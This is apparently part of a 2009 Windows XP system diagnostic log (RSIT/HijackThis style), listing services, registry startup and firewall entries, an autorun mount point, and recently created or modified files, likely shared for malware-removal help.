O17 - HKLM\System\CCS\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GtDetectSc - Option - C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Ahead Software AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: KF Web Server (KeyFocusWebServer) - Unknown owner - C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Pinnacle Systems Media Service (PinnacleSys.MediaServer) - Pinnacle Systems - C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: Fujitsu Siemens Computers Diagnostic Testhandler (TestHandler) - Fujitsu Siemens Computers - C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 8738 bytes

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-13 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
Adobe PDF Conversion Toolbar Helper - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-13 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-13 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA}]
ZoneAlarm Spy Blocker BHO - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - ZoneAlarm Spy Blocker - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"nwiz"=nwiz.exe /install []
"ZoneAlarm Client"=C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe [2008-08-21 981904]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2006-06-28 16248320]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-12-03 13680640]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-10-24 1451264]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe [2008-12-29 306088]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2007-10-18 5724184]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\InCD]
C:\Program Files\Ahead\InCD\InCD.exe [2004-02-10 1261672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
C:\Program Files\Messenger\msmsgs.exe [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
C:\Program Files\QuickTime\qttask.exe [2007-10-19 286720]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2006-05-23 402736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
UPnPMonitor - {e57ce738-33e8-4c51-8354-bb4de9d215d1} - C:\WINDOWS\system32\upnpui.dll [2008-04-14 239616]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe"="C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe:*:Enabled:Rockstar Games Social Club"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Totalcmd\TOTALCMD.EXE"="C:\Program Files\Totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit international version, file manager replacement for Windows"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
"C:\WINDOWS\system32\spoolsv.exe"="C:\WINDOWS\system32\spoolsv.exe:*:Enabled:Spooler SubSystem App"
"C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe:*:Enabled:hpofxm08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe"="C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe:*:Enabled:hposfx08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe"="C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe:*:Enabled:hpqscnvw.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe:*:Enabled:hpqcopy.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe:*:Enabled:hpzwiz01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe:*:Enabled:hpqnrs08.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMC.exe"="C:\Program Files\Pinnacle\MediaCenter\PMC.exe:LocalSubNet:Enabled:Pmc.exe"
"C:\Program Files\Pinnacle\MediaCenter\PSST.exe"="C:\Program Files\Pinnacle\MediaCenter\PSST.exe:LocalSubNet:Enabled:PSST.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe"="C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe:LocalSubNet:Enabled:PMSManager.exe"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe"="C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe:*:Enabled:Call of Duty(R) 4 - Modern Warfare(TM) "
"C:\Program Files\Messenger\msmsgs.exe"="C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe"="C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.1"
"C:\Program Files\LimeWire\LimeWire.exe"="C:\Program Files\LimeWire\LimeWire.exe:*:Enabled:LimeWire"
"C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe"="C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe:*:Enabled:kfwserv"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe:LocalSubNet:Disabled:PMCService"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]
shell\AutoRun\command - J:\setup.exe AUTORUN=1


======List of files/folders created in the last 1 months======

2009-05-29 12:37:36 ----A---- C:\WINDOWS\system32\h323log.txt
2009-05-29 12:33:50 ----A---- C:\WINDOWS\system32\hidserv.dll
2009-05-29 12:33:22 ----A---- C:\WINDOWS\system32\ksuser.dll
2009-05-29 12:32:09 ----A---- C:\WINDOWS\system32\usbui.dll
2009-05-29 12:31:03 ----SHD---- C:\WINDOWS\Installer
2009-05-29 12:31:03 ----D---- C:\Program Files\Common Files\ODBC
2009-05-29 12:31:03 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-05-29 12:31:03 ----A---- C:\WINDOWS\ODBCINST.INI
2009-05-29 12:30:57 ----D---- C:\Program Files\Common Files\SpeechEngines
2009-05-29 12:30:56 ----RD---- C:\Program Files
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuq.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuf.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdazel.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbduzb.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdtat.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdmon.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkyr.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkaz.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdaze.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdycc.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdur.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru1.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdbu.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdblr.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhept.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela3.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela2.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe319.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe220.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdgkl.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlv1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdlv.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdest.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl1.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdycl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdro.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz2.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcr.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\KBDAL.DLL
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\irclass.dll
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\dgrpsetu.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\spxcoins.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\EqnClass.Dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\dgsetup.dll
2009-05-29 12:30:28 ----N---- C:\WINDOWS\system32\CONFIG.TMP
2009-05-29 12:30:28 ----A---- C:\WINDOWS\TASKMAN.EXE
2009-05-29 12:30:27 ----A---- C:\WINDOWS\system32\batt.dll
2009-05-29 12:30:27 ----A---- C:\WINDOWS\notepad.exe
2009-05-29 12:30:26 ----A---- C:\WINDOWS\system32\storprop.dll
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3D.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3C.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3B.tmp
2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\All Users\Application Data\desktop.ini
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET3A.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET39.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET38.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET37.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET36.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET35.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET34.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET33.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET32.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET31.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET30.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2F.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2E.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2D.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2C.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2B.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2A.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET29.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET28.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET27.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET26.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET25.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET24.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET23.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET22.tmp
2009-05-29 12:30:15 ----RA---- C:\WINDOWS\SET21.tmp
2009-05-29 12:30:12 ----RA---- C:\WINDOWS\SET8.tmp
2009-05-29 12:30:08 ----RA---- C:\WINDOWS\SET4.tmp
2009-05-29 12:30:07 ----RA---- C:\WINDOWS\SET3.tmp
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot2
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot
2009-05-29 12:29:57 ----SD---- C:\Documents and Settings\All Users\Application Data\Microsoft
2009-05-29 12:29:24 ----D---- C:\Documents and Settings
2009-05-29 12:28:33 ----SHD---- C:\System Volume Information
2009-05-29 12:28:33 ----SH---- C:\boot.ini
2009-05-29 12:18:18 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-05-29 12:18:18 ----RSD---- C:\WINDOWS\Fonts
2009-05-29 12:18:18 ----RD---- C:\WINDOWS\Web
2009-05-29 12:18:18 ----HD---- C:\WINDOWS\inf
2009-05-29 12:18:18 ----D---- C:\WINDOWS\WinSxS
2009-05-29 12:18:18 ----D---- C:\WINDOWS\twain_32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wins
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wbem
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\usmt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\spool
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ShellExt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\Setup
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ras
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\oobe
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\npp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\inetsrv
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\IME
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\icsxml
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ias
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\export
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\drivers
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\dhcp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3com_dmi
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3076
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\2052
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1054
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1042
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1041
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1038
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1037
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1033
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1031
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1028
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1025
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system
2009-05-29 12:18:18 ----D---- C:\WINDOWS\security
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Resources
2009-05-29 12:18:18 ----D---- C:\WINDOWS\repair
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Provisioning
2009-05-29 12:18:18 ----D---- C:\WINDOWS\PeerNet
2009-05-29 12:18:18 ----D---- C:\WINDOWS\pchealth
2009-05-29 12:18:18 ----D---- C:\WINDOWS\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msapps
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msagent
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Media
2009-05-29 12:18:18 ----D---- C:\WINDOWS\java
2009-05-29 12:18:18 ----D---- C:\WINDOWS\ime
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Help
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Driver Cache
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Debug
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Cursors
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Connection Wizard
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\AppPatch
2009-05-29 12:18:18 ----D---- C:\WINDOWS\addins
2009-05-29 12:18:18 ----D---- C:\WINDOWS
2009-05-23 13:53:48 ----D---- C:\Program Files\trend micro
2009-05-23 13:47:26 ----A---- C:\Új Szöveges dokumentum.txt
2009-05-23 13:40:22 ----D---- C:\rsit
2009-05-23 11:46:55 ----A---- C:\WINDOWS\ntbtlog.txt
2009-05-22 20:51:55 ----A---- C:\WINDOWS\imsins.BAK
2009-05-22 20:41:54 ----D---- C:\Program Files\NT Registry Optimizer
2009-05-22 20:40:02 ----SHD---- C:\RECYCLER
2009-05-22 20:35:17 ----SD---- C:\ComboFix
2009-05-22 18:15:45 ----D---- C:\WINDOWS\temp
2009-05-20 21:23:49 ----D---- C:\Program Files\HijackThis
2009-05-19 17:04:37 ----D---- C:\Program Files\NCH Software
2009-05-19 16:42:24 ----D---- C:\Documents and Settings\Zsombor\Application Data\NCH Swift Sound
2009-05-19 16:08:49 ----D---- C:\Program Files\NCH Swift Sound
2009-05-14 14:09:58 ----D---- C:\Program Files\Microsoft Virtual PC
2009-05-10 20:18:00 ----A---- C:\WINDOWS\system32\PY_Uninstal.exe
2009-05-05 00:31:21 ----D---- C:\Program Files\webcamXP
2009-05-05 00:30:05 ----D---- C:\Documents and Settings\All Users\Application Data\WebacamSurveyor
2009-05-05 00:29:44 ----D---- C:\Program Files\Webcam Surveyor
2009-05-05 00:14:18 ----A---- C:\WINDOWS\system32\wmvdmoe.dll
2009-05-05 00:14:13 ----D---- C:\Documents and Settings\All Users\Application Data\PY_Software
2009-05-05 00:13:52 ----D---- C:\Program Files\Active WebCam
2009-05-04 12:21:22 ----D---- C:\Program Files\Noel Danjou
2009-04-27 19:50:53 ----N---- C:\WINDOWS\NuNinst.exe
2009-04-27 19:50:51 ----D---- C:\WINDOWS\InCD
2009-04-24 19:12:43 ----A---- C:\WINDOWS\myip.ini
2009-04-24 19:03:11 ----D---- C:\Program Files\KeyFocus

======List of files/folders modified in the last 1 months======

2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\Zsombor\Application Data\desktop.ini
2009-05-23 13:54:27 ----D---- C:\WINDOWS\Prefetch
2009-05-23 13:52:01 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-05-23 13:49:13 ----D---- C:\WINDOWS\Internet Logs
2009-05-23 12:37:35 ----A---- C:\WINDOWS\wincmd.ini
2009-05-23 12:36:22 ----A---- C:\WINDOWS\wcx_ftp.ini
2009-05-23 10:38:30 ----D---- C:\Documents and Settings\Zsombor\Application Data\LimeWire
2009-05-22 23:29:02 ----A---- C:\WINDOWS\win.ini
2009-05-22 20:43:32 ----D---- C:\WINDOWS\system32\LogFiles
2009-05-22 20:36:39 ----D---- C:\WINDOWS\system32\Restore
2009-05-22 20:15:51 ----D---- C:\Program Files\Opera
2009-05-22 20:11:45 ----D---- C:\Program Files\Windows Media Player
2009-05-22 20:11:43 ----D---- C:\WINDOWS\RegisteredPackages
2009-05-22 19:54:10 ----A---- C:\checkrun.txt
2009-05-22 18:21:27 ----A---- C:\WINDOWS\system.ini
2009-05-20 21:16:59 ----HD---- C:\Config.Msi
2009-05-20 21:11:02 ----D---- C:\Program Files\Adobe
2009-05-20 20:50:53 ----D---- C:\Program Files\Common Files\Adobe
2009-05-19 21:06:37 ----D---- C:\Documents and Settings\All Users\Application Data\FLEXnet
2009-05-19 18:04:20 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-05-17 19:01:01 ----D---- C:\WINDOWS\Minidump
2009-05-14 21:30:30 ----D---- C:\WINDOWS\Registration
2009-05-14 20:15:13 ----A---- C:\WINDOWS\NeroDigital.ini
2009-05-08 22:01:34 ----A---- C:\WINDOWS\system32\DivXEncSettings.txt
2009-04-28 21:43:12 ----D---- C:\Program Files\uTorrent
2009-04-27 22:07:00 ----SD---- C:\WINDOWS\Tasks
2009-04-27 19:50:51 ----D---- C:\Program Files\Ahead

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-10-24 53256]
